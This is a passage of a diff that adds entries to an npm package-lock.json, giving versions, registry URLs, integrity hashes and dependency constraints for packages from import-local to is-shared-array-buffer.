+ "pkg-dir": "^4.2.0", + "resolve-cwd": "^3.0.0" + }, + "bin": { + "import-local-fixture": "fixtures/cli.js" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/imurmurhash": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", + "integrity": "sha1-khi5srkoojixPcT7a21XbyMUU+o=", + "engines": { + "node": ">=0.8.19" + } + }, + "node_modules/indent-string": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/indent-string/-/indent-string-4.0.0.tgz", + "integrity": "sha512-EdDDZu4A2OyIK7Lr/2zG+w5jmbuk1DVBnEwREQvBzspBJkCEbRa8GxU1lghYcaGJCnRWibjDXlq779X1/y5xwg==", + "engines": { + "node": ">=8" + } + }, + "node_modules/inflection": { + "version": "1.13.4", + "resolved": "https://registry.npmjs.org/inflection/-/inflection-1.13.4.tgz", + "integrity": "sha512-6I/HUDeYFfuNCVS3td055BaXBwKYuzw7K3ExVMStBowKo9oOAMJIXIHvdyR3iboTCp1b+1i5DSkIZTcwIktuDw==", + "engines": [ + "node >= 0.4.0" + ] + }, + "node_modules/inflight": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", + "integrity": "sha1-Sb1jMdfQLQwJvJEKEHW6gWW1bfk=", + "dependencies": { + "once": "^1.3.0", + "wrappy": "1" + } + }, + "node_modules/inherits": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", + "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" + }, + "node_modules/ini": { + "version": "1.3.8", + "resolved": "https://registry.npmjs.org/ini/-/ini-1.3.8.tgz", + "integrity": "sha512-JV/yugV2uzW5iMRSiZAyDtQd+nxtUnjeLt0acNdw98kKLrvuRVyB80tsREOE7yvGVgalhZ6RNXCmEHkUKBKxew==", + "dev": true + }, + "node_modules/install": { + "version": "0.13.0", + "resolved": "https://registry.npmjs.org/install/-/install-0.13.0.tgz", + "integrity": "sha512-zDml/jzr2PKU9I8J/xyZBQn8rPCAY//UOYNmR01XwNwyfhEWObo2SWfSl1+0tm1u6PhxLwDnfsT/6jB7OUxqFA==", + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/internal-slot": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/internal-slot/-/internal-slot-1.0.7.tgz", + "integrity": "sha512-NGnrKwXzSms2qUUih/ILZ5JBqNTSa1+ZmP6flaIp6KmSElgE9qdndzS3cqjrDovwFdmwsGsLdeFgB6suw+1e9g==", + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0", + "hasown": "^2.0.0", + "side-channel": "^1.0.4" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/interpret": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/interpret/-/interpret-2.2.0.tgz", + "integrity": "sha512-Ju0Bz/cEia55xDwUWEa8+olFpCiQoypjnQySseKtmjNrnps3P+xfpUmGr90T7yjlVJmOtybRvPXhKMbHr+fWnw==", + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/invariant": { + "version": "2.2.4", + "resolved": "https://registry.npmjs.org/invariant/-/invariant-2.2.4.tgz", + "integrity": "sha512-phJfQVBuaJM5raOpJjSfkiD6BpbCE4Ns//LaXl6wGYtUBY83nWS6Rf9tXm2e8VaK60JEjYldbPif/A2B1C2gNA==", + "dev": true, + "dependencies": { + "loose-envify": "^1.0.0" + } + }, + "node_modules/ioredis": { + "version": "4.27.11", + "resolved": "https://registry.npmjs.org/ioredis/-/ioredis-4.27.11.tgz", + "integrity": "sha512-qBU2uCHgRs4kJT/qzxeFhbmizmNLQ1HH59EvKt1WnzDPMjjWxZS1+W6ynXdE47TxxqNLKYemJxEXXUb7Y4JJ+w==", + "dependencies": { + "cluster-key-slot": "^1.1.0", + "debug": "^4.3.1", + "denque": "^1.1.0", + "lodash.defaults": "^4.2.0", + "lodash.flatten": "^4.4.0", + "lodash.isarguments": "^3.1.0", + "p-map": "^2.1.0", + "redis-commands": "1.7.0", + "redis-errors": "^1.2.0", + "redis-parser": "^3.0.0", + "standard-as-callback": "^2.1.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/ioredis" + } + }, + "node_modules/ioredis/node_modules/p-map": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/p-map/-/p-map-2.1.0.tgz", + "integrity": "sha512-y3b8Kpd8OAN444hxfBbFfj1FY/RjtTd8tzYwhUqNYXx0fXx2iX4maP4Qr6qhIKbQXI02wTLAda4fYUbDagTUFw==", + "engines": { + "node": ">=6" + } + }, + "node_modules/ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", + "optional": true, + "peer": true, + "dependencies": { + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" + }, + "engines": { + "node": ">= 12" + } + }, + "node_modules/ip-address/node_modules/jsbn": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==", + "optional": true, + "peer": true + }, + "node_modules/ip-address/node_modules/sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==", + "optional": true, + "peer": true + }, + "node_modules/ip-regex": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/ip-regex/-/ip-regex-2.1.0.tgz", + "integrity": "sha1-+ni/XS5pE8kRzp+BnuUUa7bYROk=", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/ip6addr": { + "version": "0.2.5", + "resolved": "https://registry.npmjs.org/ip6addr/-/ip6addr-0.2.5.tgz", + "integrity": "sha512-9RGGSB6Zc9Ox5DpDGFnJdIeF0AsqXzdH+FspCfPPaU/L/4tI6P+5lIoFUFm9JXs9IrJv1boqAaNCQmoDADTSKQ==", + "dependencies": { + "assert-plus": "^1.0.0", + "jsprim": "^2.0.2" + } + }, + "node_modules/ip6addr/node_modules/assert-plus": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", + "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/ip6addr/node_modules/jsprim": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-2.0.2.tgz", + "integrity": "sha512-gqXddjPqQ6G40VdnI6T6yObEC+pDNvyP95wdQhkWkg7crHH3km5qP1FsOXEkzEQwnz6gz5qGTn1c2Y52wP3OyQ==", + "engines": [ + "node >=0.6.0" + ], + "dependencies": { + "assert-plus": "1.0.0", + "extsprintf": "1.3.0", + "json-schema": "0.4.0", + "verror": "1.10.0" + } + }, + "node_modules/ipaddr.js": { + "version": "1.9.1", + "resolved": "https://registry.npmjs.org/ipaddr.js/-/ipaddr.js-1.9.1.tgz", + "integrity": "sha512-0KI/607xoxSToH7GjN1FfSbLoU0+btTicjsQSWQlh/hZykN8KpmMf7uYwPW3R+akZ6R/w18ZlXSHBYXiYUPO3g==", + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/is": { + "version": "3.3.0", + "resolved": "https://registry.npmjs.org/is/-/is-3.3.0.tgz", + "integrity": "sha512-nW24QBoPcFGGHJGUwnfpI7Yc5CdqWNdsyHQszVE/z2pKHXzh7FZ5GWhJqSyaQ9wMkQnsTx+kAI8bHlCX4tKdbg==", + "engines": { + "node": "*" + } + }, + "node_modules/is-absolute-url": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/is-absolute-url/-/is-absolute-url-3.0.3.tgz", + "integrity": "sha512-opmNIX7uFnS96NtPmhWQgQx6/NYFgsUXYMllcfzwWKUMwfo8kku1TvE6hkNcH+Q1ts5cMVrsY7j0bxXQDciu9Q==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/is-accessor-descriptor": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/is-accessor-descriptor/-/is-accessor-descriptor-1.0.1.tgz", + "integrity": "sha512-YBUanLI8Yoihw923YeFUS5fs0fF2f5TSFTNiYAAzhhDscDa3lEqYuz1pDOEP5KvX94I9ey3vsqjJcLVFVU+3QA==", + "dev": true, + "dependencies": { + "hasown": "^2.0.0" + }, + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/is-arguments": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/is-arguments/-/is-arguments-1.1.1.tgz", + "integrity": "sha512-8Q7EARjzEnKpt/PCD7e1cgUS0a6X8u5tdSiMqXhojOdoV9TsMsiO+9VLC5vAmO8N7/GmXn7yjR8qnA6bVAEzfA==", + "dependencies": { + "call-bind": "^1.0.2", + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-array-buffer": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/is-array-buffer/-/is-array-buffer-3.0.4.tgz", + "integrity": "sha512-wcjaerHw0ydZwfhiKbXJWLDY8A7yV7KhjQOpb83hGgGfId/aQa4TOvwyzn2PuswW2gPCYEL/nEAiSVpdOj1lXw==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.2", + "get-intrinsic": "^1.2.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-arrayish": { + "version": "0.2.1", + "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", + "integrity": "sha1-d8mYQFJ6qOyxqLppe4BkWnqSap0=", + "dev": true + }, + "node_modules/is-arrow-function": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/is-arrow-function/-/is-arrow-function-2.0.3.tgz", + "integrity": "sha512-iDStzcT1FJMzx+TjCOK//uDugSe/Mif/8a+T0htydQ3qkJGvSweTZpVYz4hpJH0baloSPiAFQdA8WslAgJphvQ==", + "dev": true, + "dependencies": { + "is-callable": "^1.0.4" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/is-async-function": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/is-async-function/-/is-async-function-2.0.0.tgz", + "integrity": "sha512-Y1JXKrfykRJGdlDwdKlLpLyMIiWqWvuSd17TvZk68PLAOGOoF4Xyav1z0Xhoi+gCYjZVeC5SI+hYFOfvXmGRCA==", + "dev": true, + "dependencies": { + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-bigint": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/is-bigint/-/is-bigint-1.0.4.tgz", + "integrity": "sha512-zB9CruMamjym81i2JZ3UMn54PKGsQzsJeo6xvN3HJJ4CAsQNB6iRutp2To77OfCNuoxspsIhzaPoO1zyCEhFOg==", + "dependencies": { + "has-bigints": "^1.0.1" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-binary-path": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/is-binary-path/-/is-binary-path-2.1.0.tgz", + "integrity": "sha512-ZMERYes6pDydyuGidse7OsHxtbI7WVeUEozgR/g7rd0xUimYNlvZRE/K2MgZTjWy725IfelLeVcEM97mmtRGXw==", + "dev": true, + "dependencies": { + "binary-extensions": "^2.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/is-boolean-object": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/is-boolean-object/-/is-boolean-object-1.1.2.tgz", + "integrity": "sha512-gDYaKHJmnj4aWxyj6YHyXVpdQawtVLHU5cb+eztPGczf6cjuTdwve5ZIEfgXqH4e57An1D1AKf8CZ3kYrQRqYA==", + "dependencies": { + "call-bind": "^1.0.2", + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-buffer": { + "version": "1.1.6", + "resolved": "https://registry.npmjs.org/is-buffer/-/is-buffer-1.1.6.tgz", + "integrity": "sha512-NcdALwpXkTm5Zvvbk7owOUSvVvBKDgKP5/ewfXEznmQFfs4ZRmanOeKBTjRVjka3QFoN6XJ+9F3USqfHqTaU5w==", + "dev": true + }, + "node_modules/is-builtin-module": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/is-builtin-module/-/is-builtin-module-3.2.1.tgz", + "integrity": "sha512-BSLE3HnV2syZ0FK0iMA/yUGplUeMmNz4AW5fnTunbCIqZi4vG3WjJT9FHMy5D69xmAYBHXQhJdALdpwVxV501A==", + "dev": true, + "dependencies": { + "builtin-modules": "^3.3.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-callable": { + "version": "1.2.7", + "resolved": "https://registry.npmjs.org/is-callable/-/is-callable-1.2.7.tgz", + "integrity": "sha512-1BC0BVFhS/p0qtw6enp8e+8OD0UrK0oFLztSjNzhcKA3WDuJxxAPXzPuPtKkjEY9UUoEWlX/8fgKeu2S8i9JTA==", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-core-module": { + "version": "2.13.1", + "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", + "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", + "dependencies": { + "hasown": "^2.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-data-descriptor": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/is-data-descriptor/-/is-data-descriptor-1.0.1.tgz", + "integrity": "sha512-bc4NlCDiCr28U4aEsQ3Qs2491gVq4V8G7MQyws968ImqjKuYtTJXrl7Vq7jsN7Ly/C3xj5KWFrY7sHNeDkAzXw==", + "dev": true, + "dependencies": { + "hasown": "^2.0.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/is-data-view": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/is-data-view/-/is-data-view-1.0.1.tgz", + "integrity": "sha512-AHkaJrsUVW6wq6JS8y3JnM/GJF/9cf+k20+iDzlSaJrinEo5+7vRiteOSwBhHRiAyQATN1AmY4hwzxJKPmYf+w==", + "license": "MIT", + "dependencies": { + "is-typed-array": "^1.1.13" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-date-object": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/is-date-object/-/is-date-object-1.0.5.tgz", + "integrity": "sha512-9YQaSxsAiSwcvS33MBk3wTCVnWK+HhF8VZR2jRxehM16QcVOdHqPn4VPHmRK4lSr38n9JriurInLcP90xsYNfQ==", + "dependencies": { + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-descriptor": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/is-descriptor/-/is-descriptor-1.0.3.tgz", + "integrity": "sha512-JCNNGbwWZEVaSPtS45mdtrneRWJFp07LLmykxeFV5F6oBvNF8vHSfJuJgoT472pSfk+Mf8VnlrspaFBHWM8JAw==", + "dev": true, + "dependencies": { + "is-accessor-descriptor": "^1.0.1", + "is-data-descriptor": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/is-docker": { + "version": "2.2.1", + "resolved": "https://registry.npmjs.org/is-docker/-/is-docker-2.2.1.tgz", + "integrity": "sha512-F+i2BKsFrH66iaUFc0woD8sLy8getkwTwtOBjvs56Cx4CgJDeKQeqfz8wAYiSb8JOprWhHH5p77PbmYCvvUuXQ==", + "bin": { + "is-docker": "cli.js" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-equal": { + "version": "1.7.0", + "resolved": "https://registry.npmjs.org/is-equal/-/is-equal-1.7.0.tgz", + "integrity": "sha512-hErktGR9jmoYXNWlbrwGjc8eHh09mbY6TWSTTFtnMcKaCuSMN8z+Ni5ma/8mkbVpe4CbB7V6kN1MkCg9bCx5bA==", + "dev": true, + "dependencies": { + "es-get-iterator": "^1.1.3", + "es-to-primitive": "^1.2.1", + "functions-have-names": "^1.2.3", + "has-bigints": "^1.0.2", + "has-symbols": "^1.0.3", + "hasown": "^2.0.0", + "is-arrow-function": "^2.0.3", + "is-bigint": "^1.0.4", + "is-boolean-object": "^1.1.2", + "is-callable": "^1.2.7", + "is-date-object": "^1.0.5", + "is-generator-function": "^1.0.10", + "is-number-object": "^1.0.7", + "is-regex": "^1.1.4", + "is-string": "^1.0.7", + "is-symbol": "^1.0.4", + "isarray": "^2.0.5", + "object-inspect": "^1.13.1", + "object.entries": "^1.1.7", + "object.getprototypeof": "^1.0.5", + "which-boxed-primitive": "^1.0.2", + "which-collection": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-expression": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/is-expression/-/is-expression-4.0.0.tgz", + "integrity": "sha512-zMIXX63sxzG3XrkHkrAPvm/OVZVSCPNkwMHU8oTX7/U3AL78I0QXCEICXUM13BIa8TYGZ68PiTKfQz3yaTNr4A==", + "dependencies": { + "acorn": "^7.1.1", + "object-assign": "^4.1.1" + } + }, + "node_modules/is-extendable": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/is-extendable/-/is-extendable-1.0.1.tgz", + "integrity": "sha512-arnXMxT1hhoKo9k1LZdmlNyJdDDfy2v0fXjFlmok4+i8ul/6WlbVge9bhM74OpNPQPMGUToDtz+KXa1PneJxOA==", + "dev": true, + "dependencies": { + "is-plain-object": "^2.0.4" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-extglob": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz", + "integrity": "sha1-qIwCU1eR8C7TfHahueqXc8gz+MI=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-finalizationregistry": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/is-finalizationregistry/-/is-finalizationregistry-1.0.2.tgz", + "integrity": "sha512-0by5vtUJs8iFQb5TYUHHPudOR+qXYIMKtiUzvLIZITZUjknFmziyBJuLhVRc+Ds0dREFlskDNJKYIdIzu/9pfw==", + "dev": true, + "dependencies": { + "call-bind": "^1.0.2" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-fullwidth-code-point": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", + "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", + "engines": { + "node": ">=8" + } + }, + "node_modules/is-generator-function": { + "version": "1.0.10", + "resolved": "https://registry.npmjs.org/is-generator-function/-/is-generator-function-1.0.10.tgz", + "integrity": "sha512-jsEjy9l3yiXEQ+PsXdmBwEPcOxaXWLspKdplFUVI9vq1iZgIekeC0L167qeu86czQaxed3q/Uzuw0swL0irL8A==", + "dependencies": { + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-glob": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/is-glob/-/is-glob-4.0.3.tgz", + "integrity": "sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg==", + "dependencies": { + "is-extglob": "^2.1.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-inside-container": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/is-inside-container/-/is-inside-container-1.0.0.tgz", + "integrity": "sha512-KIYLCCJghfHZxqjYBE7rEy0OBuTd5xCHS7tHVgvCLkx7StIoaxwNW3hCALgEUjFfeRk+MG/Qxmp/vtETEF3tRA==", + "dev": true, + "license": "MIT", + "dependencies": { + "is-docker": "^3.0.0" + }, + "bin": { + "is-inside-container": "cli.js" + }, + "engines": { + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-inside-container/node_modules/is-docker": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/is-docker/-/is-docker-3.0.0.tgz", + "integrity": "sha512-eljcgEDlEns/7AXFosB5K/2nCM4P7FQPkGc/DWLy5rmFEWvZayGrik1d9/QIY5nJ4f9YsVvBkA6kJpHn9rISdQ==", + "dev": true, + "license": "MIT", + "bin": { + "is-docker": "cli.js" + }, + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-installed-globally": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/is-installed-globally/-/is-installed-globally-0.4.0.tgz", + "integrity": "sha512-iwGqO3J21aaSkC7jWnHP/difazwS7SFeIqxv6wEtLU8Y5KlzFTjyqcSIT0d8s4+dDhKytsk9PJZ2BkS5eZwQRQ==", + "dev": true, + "dependencies": { + "global-dirs": "^3.0.0", + "is-path-inside": "^3.0.2" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-ip": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/is-ip/-/is-ip-2.0.0.tgz", + "integrity": "sha1-aO6gfooKCpTC0IDdZ0xzGrKkYas=", + "dev": true, + "dependencies": { + "ip-regex": "^2.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/is-map": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/is-map/-/is-map-2.0.2.tgz", + "integrity": "sha512-cOZFQQozTha1f4MxLFzlgKYPTyj26picdZTx82hbc/Xf4K/tZOOXSCkMvU4pKioRXGDLJRn0GM7Upe7kR721yg==", + "dev": true, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-nan": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/is-nan/-/is-nan-1.3.2.tgz", + "integrity": "sha512-E+zBKpQ2t6MEo1VsonYmluk9NxGrbzpeeLC2xIViuO2EjU2xsXsBPwTr3Ykv9l08UYEVEdWeRZNouaZqF6RN0w==", + "dependencies": { + "call-bind": "^1.0.0", + "define-properties": "^1.1.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-negated-glob": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/is-negated-glob/-/is-negated-glob-1.0.0.tgz", + "integrity": "sha512-czXVVn/QEmgvej1f50BZ648vUI+em0xqMq2Sn+QncCLN4zj1UAxlT+kw/6ggQTOaZPd1HqKQGEqbpQVtJucWug==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-negative-zero": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/is-negative-zero/-/is-negative-zero-2.0.3.tgz", + "integrity": "sha512-5KoIu2Ngpyek75jXodFvnafB6DJgr3u8uuK0LEZJjrU19DrMD3EVERaR8sjz8CCGgpZvxPl9SuE1GMVPFHx1mw==", + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-network-error": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/is-network-error/-/is-network-error-1.0.1.tgz", + "integrity": "sha512-OwQXkwBJeESyhFw+OumbJVD58BFBJJI5OM5S1+eyrDKlgDZPX2XNT5gXS56GSD3NPbbwUuMlR1Q71SRp5SobuQ==", + "dev": true, + "engines": { + "node": ">=16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/is-number": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", + "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", + "engines": { + "node": ">=0.12.0" + } + }, + "node_modules/is-number-object": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/is-number-object/-/is-number-object-1.0.7.tgz", + "integrity": "sha512-k1U0IRzLMo7ZlYIfzRu23Oh6MiIFasgpb9X76eqfFZAqwH44UI4KTBvBYIZ1dSL9ZzChTB9ShHfLkR4pdW5krQ==", + "dependencies": { + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-obj": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/is-obj/-/is-obj-2.0.0.tgz", + "integrity": "sha512-drqDG3cbczxxEJRoOXcOjtdp1J/lyp1mNn0xaznRs8+muBhgQcrnbspox5X5fOw0HnMnbfDzvnEMEtqDEJEo8w==", + "engines": { + "node": ">=8" + } + }, + "node_modules/is-path-inside": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/is-path-inside/-/is-path-inside-3.0.3.tgz", + "integrity": "sha512-Fd4gABb+ycGAmKou8eMftCupSir5lRxqf4aD/vd0cD2qc4HL07OjCeuHMr8Ro4CoMaeCKDB0/ECBOVWjTwUvPQ==", + "engines": { + "node": ">=8" + } + }, + "node_modules/is-plain-obj": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/is-plain-obj/-/is-plain-obj-2.1.0.tgz", + "integrity": "sha512-YWnfyRwxL/+SsrWYfOpUtz5b3YD+nyfkHvjbcanzk8zgyO4ASD67uVMRt8k5bM4lLMDnXfriRhOpemw+NfT1eA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=8" + } + }, + "node_modules/is-plain-object": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-2.0.4.tgz", + "integrity": "sha512-h5PpgXkWitc38BBMYawTYMWJHFZJVnBquFE57xFpjB8pJFiF6gZ+bU+WyI/yqXiFR5mdLsgYNaPe8uao6Uv9Og==", + "dev": true, + "dependencies": { + "isobject": "^3.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-potential-custom-element-name": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/is-potential-custom-element-name/-/is-potential-custom-element-name-1.0.1.tgz", + "integrity": "sha512-bCYeRA2rVibKZd+s2625gGnGF/t7DSqDs4dP7CrLA1m7jKWz6pps0LpYLJN8Q64HtmPKJ1hrN3nzPNKFEKOUiQ==", + "dev": true + }, + "node_modules/is-promise": { + "version": "2.2.2", + "resolved": "https://registry.npmjs.org/is-promise/-/is-promise-2.2.2.tgz", + "integrity": "sha512-+lP4/6lKUBfQjZ2pdxThZvLUAafmZb8OAxFb8XXtiQmS35INgr85hdOGoEs124ez1FCnZJt6jau/T+alh58QFQ==" + }, + "node_modules/is-regex": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/is-regex/-/is-regex-1.1.4.tgz", + "integrity": "sha512-kvRdxDsxZjhzUX07ZnLydzS1TU/TJlTUHHY4YLL87e37oUA49DfkLqgy+VjFocowy29cKvcSiu+kIv728jTTVg==", + "dependencies": { + "call-bind": "^1.0.2", + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-set": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/is-set/-/is-set-2.0.2.tgz", + "integrity": "sha512-+2cnTEZeY5z/iXGbLhPrOAaK/Mau5k5eXq9j14CpRTftq0pAJu2MwVRSZhyZWBzx3o6X795Lz6Bpb6R0GKf37g==", + "dev": true, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-shallow-equal": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/is-shallow-equal/-/is-shallow-equal-1.0.1.tgz", + "integrity": "sha512-lq5RvK+85Hs5J3p4oA4256M1FEffzmI533ikeDHvJd42nouRRx5wBzt36JuviiGe5dIPyHON/d0/Up+PBo6XkQ==", + "dev": true + }, + "node_modules/is-shared-array-buffer": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/is-shared-array-buffer/-/is-shared-array-buffer-1.0.3.tgz", + "integrity": 